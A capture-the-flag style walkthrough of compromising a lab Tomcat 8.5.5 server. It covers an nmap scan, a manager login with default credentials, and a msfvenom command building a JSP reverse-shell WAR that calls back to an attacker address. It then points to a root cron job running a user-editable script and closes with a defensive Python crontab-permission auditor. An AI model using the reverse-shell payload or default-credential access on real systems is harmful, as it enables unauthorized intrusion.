```
# Nmap 7.92 scan initiated Wed Jan 25 17:21:06 2023 as: nmap -sCV -v -oN init.txt 10.10.19.163
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 25 17:29:56 2023 -- 1 IP address (1 host up) scanned in 529.87 seconds
```
We can see Tomcat is running on port 8080. I tried the default credentials from the 403 Forbidden page and logged in. Now we can upload a WAR file to get a reverse shell.
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.57 LPORT=9999 -f war -o evil.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Saved as: evil.war
```
In the home directory I found a file `id.sh` with the following content.
```
cat id.sh
#!/bin/bash
id > test.txt
```
There was a cron job running every minute that would write the output of `id` to test.txt as root.
```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
```
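The misconfiguration above (a root cron job executing a script that a non-root user can edit) is something an administrator can audit for directly. The following is an added example written for this page, not code from the original writeup: it parses system-crontab lines and flags root entries whose target is owned by a non-root user or is group/world-writable. The `root_uid` parameter and the files created by `demo()` are constructed so the check runs offline as an unprivileged user.

```python
import os
import stat
import tempfile

TIME_FIELDS = 5  # system crontab: five time fields, a user field, then the command

def parse_system_crontab(text):
    """Yield (user, command) for every active entry in system-crontab text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or variable such as SHELL=/bin/sh
        parts = line.split(None, TIME_FIELDS + 1)
        if len(parts) < TIME_FIELDS + 2:
            continue  # malformed or @reboot-style entry: not handled here
        yield parts[TIME_FIELDS], parts[TIME_FIELDS + 1]

def script_path(command):
    """First token of the command: the script or binary cron will execute."""
    return command.split()[0]

def writable_by_non_root(path, root_uid=0):
    """True if the target is owned by a non-root user or is group/world-writable.
    root_uid is an assumption hook so the offline demo can treat its files as root's."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False  # a missing target is a separate finding, not checked here
    return st.st_uid != root_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def risky_root_entries(text, root_uid=0):
    """Root-run entries whose target script a non-root user could modify."""
    return [(user, cmd) for user, cmd in parse_system_crontab(text)
            if user == "root" and writable_by_non_root(script_path(cmd), root_uid)]

def demo():
    """Constructed scenario: a world-writable id.sh run by root every minute,
    beside a correctly permissioned script. Returns the flagged script names."""
    with tempfile.TemporaryDirectory() as tmp:
        loose, tight = os.path.join(tmp, "id.sh"), os.path.join(tmp, "backup.sh")
        for path in (loose, tight):
            with open(path, "w") as fh:
                fh.write("#!/bin/bash\nid > test.txt\n")
        os.chmod(loose, 0o777)  # anyone can edit what root will execute
        os.chmod(tight, 0o755)  # owner-only write
        crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
                   f"* * * * * root {loose}\n0 3 * * * root {tight}\n")
        flagged = risky_root_entries(crontab, root_uid=os.getuid())
        return [os.path.basename(script_path(cmd)) for _, cmd in flagged]
```

Run against the real `/etc/crontab` and `/etc/cron.d/*` with the default `root_uid=0`; the fix for any hit is to make the script root-owned and mode 0755 or tighter.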